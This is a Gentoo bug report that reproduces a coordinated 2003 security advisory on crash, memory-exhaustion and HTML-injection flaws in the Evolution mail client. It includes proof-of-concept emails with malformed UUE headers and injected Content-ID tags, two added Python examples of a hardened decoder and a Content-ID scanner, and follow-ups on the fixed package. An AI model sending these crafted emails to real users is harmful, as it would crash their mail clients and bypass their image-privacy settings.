Bug 17856 - net-mail/evolution
Summary: net-mail/evolution
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages
Hardware: All Linux
Importance: Highest critical
Assignee: Gentoo Security
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2003-03-20 03:06 UTC by Daniel Ahlberg (RETIRED)
Modified: 2003-03-24 05:00 UTC
CC List: 2 users

See Also:
Package list:
Runtime testing required: ---


Description Daniel Ahlberg (RETIRED) gentoo-dev 2003-03-20 03:06:44 UTC
CORE-2003-03-04-01: Multiple vulnerabilities in Ximian 's Evolution Mail User Agent 
 
From: CORE SECURITY TECHNOLOGIES ADVISORIES <advisories@coresecurity.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org
Date: Today 00.46.12
 
                      Core Security Technologies Advisory 
                         http://www.coresecurity.com 
 
       Multiple vulnerabilities in Ximian's Evolution Mail User Agent 
 
 
Date Published: 2003-03-19 
 
Last Update: 2003-03-19 
 
Advisory ID: CORE-20030304-01 
 
Bugtraq IDs: 7117, 7118, 7119 
 
CVE CAN:  CAN-2003-0128 CAN-2003-0129 CAN-2003-0130 
 
Title: Multiple vulnerabilities in Ximian's Evolution Mail User Agent 
 
Class: Input validation error; 
       Failure to handle exceptional conditions; 
       Information Gathering 
 
Remotely Exploitable: Yes 
 
Locally Exploitable: Yes 
 
Advisory URL: 
 http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10 
 
Vendors contacted: 
 
- Ximian 
  . CORE notification: 2003-03-11 
  . Notification acknowledged by Ximian: 2003-03-11 
  . Fixes added by Ximian to CVS tree: 2003-03-12 
  . BID, CVE numbers assigned: 2003-03-18 
  . Roll out of fixes: 2003-03-19 
  . Advisory published: 2003-03-19 
 
Release Mode: COORDINATED RELEASE 
 
*Vulnerability Description:* 
 
 Ximian Evolution is a personal and workgroup information management 
 solution for Linux and UNIX-based systems. The software integrates 
 email, calendaring, meeting scheduling, contact management, and task 
 lists, in one application. For more information about Ximian 
 Evolution visit http://www.ximian.com 
  
 Three vulnerabilities were found that could lead to various forms of 
 exploitation, ranging from denying users the ability to read email and 
 provoking system instability to bypassing security context checks for 
 email content and possibly executing arbitrary commands on 
 vulnerable systems. 
  
 The following security vulnerabilities were found: 
 
 [CAN-2003-0128, BID 7117] 
 
 The Evolution mailer accepts UUEncoded content and will 
 transparently decode it. By including a specially crafted UUE header 
 as part of an otherwise perfectly normal email an attacker has the 
 ability to crash Evolution as soon as the mail is parsed. This makes 
 it particularly difficult to delete this email from Evolution's GUI 
 and prevents a user from reading email until the malicious mail is 
 removed from the mailbox. 
 
 All versions of Evolution that include the function 
 try_uudecoding in the module mail/mail-format.c are vulnerable. 
 
 [CAN-2003-0129, BID 7118] 
 
 Having the Evolution mailer process mail content UUencoded multiple 
 times will cause resource starvation. The MUA will try to allocate 
 memory until it dies, possibly leading to system instability. 
 Our example in the technical details section uses email content 
 encoded 3 times. 
 
 [CAN-2003-0130, BID 7119] 
 
 By including a specially crafted MIME Content-ID header as part of 
 an image/* MIME part, it is possible to include arbitrary data, 
 including HTML tags, into the stream that is passed to GTKHtml for 
 rendering. 
 
 These vulnerabilities provide multiple exploitation possibilities 
 in the Evolution mailer. Namely, it is possible: 
 
 a) To crash the application. The crash appears to be the result 
   of heap corruption; further research on this bug is required 
   to demonstrate successful exploitation to run arbitrary commands 
   on vulnerable systems. 
 
 b) To bypass the "Don't connect to remote hosts to fetch images" 
   option. 
 
 c) To execute some bonobo components and pass them arbitrary content, 
   included as part of the mail. 
 
*Vulnerable Packages:* 
 
 Evolution 1.2.2 and prior releases are vulnerable, partially or 
 wholly, to the vulnerabilities in this advisory. 
 
*Solution/Vendor Information/Workaround:* 
 
 Ximian is providing Evolution 1.2.3 on [March 18/March 19]. This 
 release resolves all vulnerabilities in this advisory as well as 
 other unrelated bugs. The patched code for Evolution that resolves 
 these vulnerabilities is also already available in GNOME CVS. 
 
 A workaround for unpatched versions of Evolution to prevent Evolution 
 from crashing when viewing messages that exploit these 
 vulnerabilities is to go into "View"->"Message Display" and change 
 the value to "Show E-mail Source." 
 
 Distribution vendors who provide their own version of Evolution have 
 been advised of these issues as well as having been provided the 
 patches to fix them. They may provide updated packages for their 
 distributions. 
 
 
*Credits:* 
 
 These vulnerabilities were found by Diego Kelyacoubian, Javier Kohen, 
 Alberto Solino, and Juan Vera from Core Security Technologies during 
 Bugweek 2003 (March 3-7, 2003). 
 
 We would like to thank Carlos Montero Luque at Ximian for quickly 
 addressing our report and coordinating the generation and 
 public release of patches and information regarding these 
 vulnerabilities. 
  
 Thanks also to Jeffrey Stedfast and other members of the Evolution 
 development team for the followup and development of the patches to 
 close these vulnerabilities. 
 
*Technical Description - Exploit/Concept Code:* 
 
 [CAN-2003-0128, BID 7117] 
 
 The following email will reproduce this vulnerability; note that 
 an empty line is required before and after the UUE header line. 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: inline; filename=name 
Content-Type: application/octet-stream; name=name 
Content-Transfer-Encoding: 7bit 
 
begin 600 
  
end 
 
--=-mTDu5zdJIsixETTwCF5Y-- 
 
 
 [CAN-2003-0129, BID 7118] 
 
 The following email will reproduce this vulnerability. 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: inline; filename=name 
Content-Type: application/octet-stream; name=name 
Content-Transfer-Encoding: 7bit 
 
begin 600 phase2 
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310 
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C 
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20\ 
M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC 
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T 
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A- 
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@   
  
end 
--=-mTDu5zdJIsixETTwCF5Y-- 
 
 [CAN-2003-0130, BID 7119] 
 
 The handle_image() function, located in the module 
 mail/mail-format.c, lacks proper input checking. This function does 
 not escape HTML characters in the string returned by get_cid, which 
 is in turn constructed from the Content-ID MIME header included in 
 the MIME part. 
 
 It can be exploited several ways, for instance: 
 
 a) The Evolution mailer will crash when a MIME part's Content-ID is 
    referenced from two different object tags via the cid "protocol". 
    The following email will reproduce this vulnerability in Evolution 
    version 1.2.1: 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Type: text/plain 
Content-Transfer-Encoding: 7bit 
Content-Id: hello 
 
Hello World! 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: attachment; filename=name1.gif 
Content-Type: image/gif;  name=name1.gif 
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr " 
Content-Transfer-Encoding: base64 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: attachment; filename=name2.gif 
Content-Type: image/gif;  name=name2.gif 
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr " 
Content-Transfer-Encoding: base64 
 
--=-mTDu5zdJIsixETTwCF5Y 
 
 b) The following email bypasses the "Don't connect to remote hosts 
    to fetch images" option. 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Type: text/html 
Content-Transfer-Encoding: 7bit 
Content-Id: apart 
 
<img src="http://external.host.com:anyport"> 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: attachment; filename=name2.gif 
Content-Type: image/gif;  name=name2.gif 
Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr " 
Content-Transfer-Encoding: base64 
 
--=-mTDu5zdJIsixETTwCF5Y 
 
 c) It is possible to execute bonobo components to handle content 
    types that the Evolution mailer does not handle internally (for 
    example audio/ulaw). The following mail uses the Content-ID bug to 
    execute the bonobo-audio-ulaw component (bundled by default with 
    bonobo) and pass it arbitrary content. 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Type: audio/ulaw 
Content-Transfer-Encoding: 7bit 
Content-Id: mysong 
 
There she was, just walking down the street... 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: attachment; filename=name2.gif 
Content-Type: image/gif;  name=name2.gif 
Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr " 
Content-Transfer-Encoding: base64 
 
--=-mTDu5zdJIsixETTwCF5Y 
 
 
*About Core Security Technologies* 
  
 Core Security Technologies develops strategic security solutions for 
 Fortune 1000 corporations, government agencies and military 
 organizations. The company offers information security software and 
 services designed to assess risk and protect and manage information assets. 
 Headquartered in Boston, MA, Core Security Technologies can be reached at 
 617-399-6980 or on the Web at http://www.coresecurity.com. 
 
 To learn more about CORE IMPACT, the first comprehensive penetration 
 testing framework, visit http://www.coresecurity.com/products/coreimpact 
 
*DISCLAIMER:* 
 
 The contents of this advisory are copyright (c) 2003 CORE Security 
 Technologies and may be distributed freely provided that no fee is 
 charged for this distribution and proper credit is given. 
 
$Id: Ximian-Evolution-advisory.txt,v 1.2 2003/03/19 23:05:30 iarce Exp $
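For the two uudecode issues in the advisory above (CAN-2003-0128, a `begin 600` header with no filename and no body, and CAN-2003-0129, content uuencoded three times), the following is an added Python example, not Evolution's try_uudecoding nor any Core code, of a decoder that refuses both shapes: it validates the begin line, caps decoded size, and stops peeling nested layers after an assumed limit of two passes. MAX_LAYERS and MAX_OUTPUT are assumed values, and uuencode() is only a helper for building inputs.

```python
import binascii
import re

# Added example, not Evolution's try_uudecoding: refuse a 'begin' line with no
# filename (the CAN-2003-0128 PoC) and cap layers/size (the CAN-2003-0129 PoC).
BEGIN_RE = re.compile(r"^begin ([0-7]{3,4}) (\S.*)$")
MAX_LAYERS = 2        # uudecode passes allowed on one message (assumed cap)
MAX_OUTPUT = 1 << 20  # decoded bytes allowed per layer (assumed cap)

class UUDecodeError(ValueError):
    """Raised instead of passing a malformed or oversized payload on."""

def uudecode(text: str) -> bytes:
    """Decode one uuencoded block, checking the header and size as it goes."""
    lines = text.splitlines()
    start = next((i for i, ln in enumerate(lines) if BEGIN_RE.match(ln)), None)
    if start is None:
        raise UUDecodeError("no valid 'begin <mode> <name>' line")
    out = bytearray()
    for line in lines[start + 1:]:
        if line == "end":
            return bytes(out)
        if line.strip():                   # blank filler lines carry no data
            out += binascii.a2b_uu(line)   # raises binascii.Error if corrupt
        if len(out) > MAX_OUTPUT:
            raise UUDecodeError("decoded output exceeds cap")
    raise UUDecodeError("missing 'end' line")

def uudecode_nested(text: str, layers_left: int = MAX_LAYERS) -> bytes:
    """Peel uuencode layers until the payload is no longer uuencoded."""
    if layers_left == 0:
        raise UUDecodeError("uuencode nesting too deep")
    data = uudecode(text)
    inner = data.decode("ascii", errors="replace")
    if not any(BEGIN_RE.match(ln) for ln in inner.splitlines()):
        return data                        # plain payload: nothing more to peel
    return uudecode_nested(inner, layers_left - 1)

def decode_or_reject(text: str):
    try:
        return uudecode_nested(text)
    except ValueError:                     # UUDecodeError and binascii.Error
        return None

def uuencode(data: bytes, name: str = "f") -> str:
    """Minimal encoder used to build inputs; zero bits are written as '`'."""
    body = [binascii.b2a_uu(data[i:i + 45], backtick=True).decode().rstrip("\n")
            for i in range(0, len(data), 45)]
    return "\n".join([f"begin 644 {name}", *body, "`", "end"]) + "\n"
```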
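For the Content-ID issue (CAN-2003-0130) described above, an added Python example, not Evolution's handle_image()/get_cid code: the unescaped tag construction beside a hardened one that accepts only an RFC 2392 msg-id and escapes it, plus a scan over a constructed message shaped like the PoC. The msg-id check is strict and also rejects bare ids such as `hello` that lack a domain part.

```python
import email
import html
import re

# Added example, not Evolution's handle_image()/get_cid code: the unescaped
# construction beside a hardened one, plus a scan that flags Content-ID values
# which are not msg-ids (RFC 2392 cid: URLs), the shape of the CAN-2003-0130 PoC.
MSG_ID_RE = re.compile(r"^<[A-Za-z0-9!#$%&'*+/=?^_`{|}~.-]+@[A-Za-z0-9.-]+>$")

def vulnerable_img_tag(cid: str) -> str:
    """Header text is interpolated verbatim, so it can close the attribute."""
    return f'<img src="cid:{cid}">'

def hardened_img_tag(cid: str):
    """Accept only a bare or bracketed msg-id, escape it, or return None."""
    cid = cid.strip()
    if not cid.startswith("<"):
        cid = f"<{cid}>"              # tolerate ids written without brackets
    if not MSG_ID_RE.match(cid):
        return None
    # The whitelist above already excludes quotes and angle brackets; escaping
    # is the second line of defence should the grammar ever be loosened.
    return f'<img src="cid:{html.escape(cid[1:-1], quote=True)}">'

def suspicious_content_ids(raw: bytes) -> list:
    """(part index, Content-ID) for each part whose id is not a msg-id."""
    msg = email.message_from_bytes(raw)
    return [(i, cid) for i, part in enumerate(msg.walk())
            if (cid := part.get("Content-ID")) is not None
            and hardened_img_tag(cid) is None]

# Constructed sample shaped like the advisory's PoC (attachment body omitted).
SAMPLE = b"""\
Content-Type: multipart/mixed; boundary="bnd"
MIME-Version: 1.0

--bnd
Content-Type: text/plain
Content-Id: <hello@example.invalid>

Hello World!

--bnd
Content-Type: image/gif; name=name1.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64

--bnd--
"""
```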
Comment 1 Alastair Tse (RETIRED) gentoo-dev 2003-03-20 22:08:18 UTC
evo-1.2.3 has been released on the 21st Mar 2003. However, there were a few complications:

1. evolution-1.2.3's tarball is not available yet. However, their SRPMs are available, so I've mirrored the tarball on gentoo's distfiles-local.

2. A couple of the deps need to be bumped up; they are already in portage. I've got an ebuild standing by which I'm testing first to make sure that the new evolution compiles and works.

Comment 2 Alastair Tse (RETIRED) gentoo-dev 2003-03-21 09:39:21 UTC
evolution-1.2.3 is now in portage and marked as stable.
Comment 3 Daniel Ahlberg (RETIRED) gentoo-dev 2003-03-24 05:00:35 UTC
GLSA sent.